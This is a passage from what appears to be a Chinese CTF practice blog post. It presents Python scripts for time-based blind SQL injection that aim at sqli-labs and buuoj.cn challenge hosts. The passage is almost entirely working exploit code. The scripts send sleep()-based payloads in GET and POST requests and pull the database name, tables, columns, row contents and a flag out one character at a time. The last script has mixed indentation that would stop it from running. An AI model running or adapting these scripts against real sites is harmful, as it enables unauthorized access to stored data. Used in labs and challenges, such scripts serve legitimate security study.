	for item in range(len(DBTables)):
		print("(" + str(item + 1) + ")" + DBTables[item])
	tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
	GetDBColumns(url,DBName,DBTables[tableIndex])
	while True:
		print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
		for item in range(len(DBColumns)):
			print("(" + str(item + 1) + ")" + DBColumns[item])
		columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
		if(columnIndex == -1):
			break
		else:
			GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

if __name__ == '__main__':
	try:
		usage = "./BlindTime_get.py -u url"
		parser = OptionParser(usage)
		# 目标URL参数-u
		parser.add_option('-u', '--url', dest='url',default='http://localhost/Less-15/', type='string',help='target URL')
		options, args = parser.parse_args()
		url = options.url
		threadSQL = threading.Thread(target=StartSqli,args=(url,))
		threadSQL.start()
	except KeyboardInterrupt:
		print("Interrupted by keyboard inputting!!!")

整体改动过的脚本Time-POST

修改的地方:

payload

data

添加了time.sleep(0.05)

default

修改时要注意间隔

python 复制代码
#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading

# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}

# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False


# 获取数据库名函数
def GetDBName(url):
    # 引用全局变量DBName,用来存放网页当前使用的数据库名
    global DBName
    print("[-]开始获取数据库名长度")
    # 保存数据库名长度变量
    DBNameLen = 0
    # 用for循环来遍历请求,得到数据库名长度
    for DBNameLen in range(1, 99):
        # 开始时间
        timeStart = time.time()
        payload = "if(length(database())=" + str(DBNameLen) + ",sleep(5),0)"
        # "admin' and if(length(database())=8,sleep(5),0) #"
        data = {
            'id': payload,
        }
        res = conn.post(url, data=data)
        # 结束时间
        timeEnd = time.time()
        # 判断时间差
        if timeEnd - timeStart >= 5:
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    print("[-]开始获取数据库名")
    # a表示substr()函数的截取起始位置
    for a in range(1, DBNameLen + 1):
        # b表示33~127位ASCII中可显示字符
        for b in range(33, 128):
            time.sleep(0.05)
            timeStart = time.time()
            payload = "if(ascii(substr(database()," + str(a) + ",1))=" + str(b) + ",sleep(5),0)"
            data = {
                'id': payload,
            }
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                DBName += chr(b)
                print("[-]" + DBName)
                break


# 获取数据库表函数
def GetDBTables(url, dbname):
    global DBTables
    # 存放数据库表数量的变量
    DBTableCount = 0
    print("[-]开始获取{0}数据库表数量:".format(dbname))
    # 开始遍历获取数据库表的数量
    for DBTableCount in range(1, 99):
        time.sleep(0.05)
        timeStart = time.time()
        payload = "if((select count(table_name) from information_schema.tables where table_schema='" + dbname + "' )=" + str(DBTableCount) + ",sleep(5),0)"
        data = {
            'id': payload,
        }
        res = conn.post(url, data=data)
        timeEnd = time.time()
        if timeEnd - timeStart >= 5:
            print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
            break
    print("[-]开始获取{0}数据库的表".format(dbname))
    # 遍历表名时临时存放表名长度变量
    tableLen = 0
    # a表示当前正在获取表的索引
    for a in range(0, DBTableCount):
        print("[-]正在获取第{0}个表名".format(a + 1))
        # 先获取当前表名的长度
        for tableLen in range(1, 99):
            time.sleep(0.05)
            payload = "if((select length(table_name) from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)=" + str(tableLen) + ",sleep(5),0)"
            timeStart = time.time()
            data = {
                'id': payload,
            }
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                break
        # 开始获取表名
        # 临时存放当前表名的变量
        table = ""
        # b表示当前表名猜解的位置
        for b in range(1, tableLen + 1):
            # c表示33~127位ASCII中可显示字符
            for c in range(33, 128):
                time.sleep(0.05)
                timeStart = time.time()
                payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
                data = {
                    'id': payload,
                }
                res = conn.post(url, data=data)
                timeEnd = time.time()
                if timeEnd - timeStart >= 5:
                    table += chr(c)
                    print(table)
                    break
        # 把获取到的名加入到DBTables
        DBTables.append(table)
        # 清空table,用来继续获取下一个表名
        table = ""


# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
    global DBColumns
    # 存放字段数量的变量
    DBColumnCount = 0
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(99):
        time.sleep(0.05)
        payload = "if((select count(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "')=" + str(DBColumnCount) + ",sleep(5),0)"
        data = {
            'id': payload,
        }
        timeStart = time.time()
        res = conn.post(url, data=data)
        timeEnd = time.time()
        if timeEnd - timeStart >= 5:
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
            break
    # 开始获取字段的名称
    # 保存字段名的临时变量
    column = ""
    # a表示当前获取字段的索引
    for a in range(0, DBColumnCount):
        print("[-]正在获取第{0}个字段名".format(a + 1))
        # 先获取字段的长度
        for columnLen in range(99):
            time.sleep(0.05)
            payload = "if((select length(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)=" + str(columnLen) + ",sleep(5),0)"
            data = {
                'id': payload,
            }
            timeStart = time.time()
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                break
        # b表示当前字段名猜解的位置
        for b in range(1, columnLen + 1):
            # c表示33~127位ASCII中可显示字符
            for c in range(33, 128):
                time.sleep(0.05)
                timeStart = time.time()
                payload = "if(ascii(substr((select column_name from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
                data = {
                    'id': payload,
                }
                res = conn.post(url, data=data)
                timeEnd = time.time()
                if timeEnd - timeStart >= 5:
                    column += chr(c)
                    print(column)
                    break
        # 把获取到的名加入到DBColumns
        DBColumns.append(column)
        # 清空column,用来继续获取下一个字段名
        column = ""


# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    global DBData
    # 先获取字段数据数量
    DBDataCount = 0
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    for DBDataCount in range(99):
        time.sleep(0.05)
        payload = "if((select count(" + dbcolumn + ") from " + dbtable + ")=" + str(DBDataCount) + ",sleep(5),0)"
        data = {
            'id': payload,
        }
        timeStart = time.time()
        res = conn.post(url, data=data)
        timeEnd = time.time()
        if timeEnd - timeStart >= 5:
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    for a in range(0, DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))
        # 先获取这个数据的长度
        dataLen = 0
        for dataLen in range(99):
            time.sleep(0.05)
            payload = "if((select length(" + dbcolumn + ") from " + dbtable + " limit " + str(a) + ",1)=" + str(dataLen) + ",sleep(5),0)"
            data = {
                'id': payload,
            }
            timeStart = time.time()
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))
                break
        # 临时存放数据内容变量
        data1 = ""
        # 开始获取数据的具体内容
        # b表示当前数据内容猜解的位置
        for b in range(1, dataLen + 1):
            for c in range(33, 128):
                time.sleep(0.05)
                payload = "if(ascii(substr((select " + dbcolumn + " from " + dbtable + " limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
                data = {
                    'id': payload,
                }
                timeStart = time.time()
                res = conn.get(url, data=data)
                timeEnd = time.time()
                if timeEnd - timeStart >= 5:
                    data1 += chr(c)
                    print(data1)
                    break
        # 放到以字段名为键,值为列表的字典中存放
        DBData.setdefault(dbcolumn, []).append(data1)
        print(DBData)
        # 把data清空来,继续获取下一个数据
        data1 = ""


# 盲注主函数
def StartSqli(url):
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            time.sleep(0.05)
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if (columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


if __name__ == '__main__':
    try:
        usage = "./BlindTime_get.py -u url"
        parser = OptionParser(usage)
        # 目标URL参数-u
        parser.add_option('-u', '--url', dest='url',
                          default='http://1e21f92c-e6dd-42ac-95f0-ed1281e49749.node4.buuoj.cn:81/', type='string',
                          help='target URL')
        options, args = parser.parse_args()
        url = options.url
        threadSQL = threading.Thread(target=StartSqli, args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")

时间盲注-POST-1

python 复制代码
#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading


# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}

# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False

def woqv(url):
	a=""
	print("[-]开始获取数据库名长度")
	# 用for循环来遍历请求,得到数据库名长度
	for ll in range(1, 50):
 		for kk in range(33,127):
	 		time.sleep(0.05)
			# 开始时间
			timeStart = time.time()
			payload = "if((ascii(substr((select(flag)from(flag))," + str(ll) + ",1))=" + str(kk) + "),sleep(5),0)"
			# "admin' and if(length(database())=8,sleep(5),0) #"
			data = {
				'id':payload,
			}
			res = conn.post(url,data=data)
			# 结束时间
			timeEnd = time.time()
			# 判断时间差
			if timeEnd - timeStart >= 5:
				a+=chr(kk)
				print(a)
				break
			



# 盲注主函数
def StartSqli(url):
	woqv(url)

if __name__ == '__main__':
	try:
		usage = "./BlindTime_get.py -u url"
		parser = OptionParser(usage)
		# 目标URL参数-u
		parser.add_option('-u', '--url', dest='url',default='http://4fbbc7a5-c5b9-4628-b997-a2c82c97252d.node4.buuoj.cn:81/', type='string',help='target URL')
		options, args = parser.parse_args()
		url = options.url
		threadSQL = threading.Thread(target=StartSqli,args=(url,))
		threadSQL.start()
	except KeyboardInterrupt:
		print("Interrupted by keyboard inputting!!!")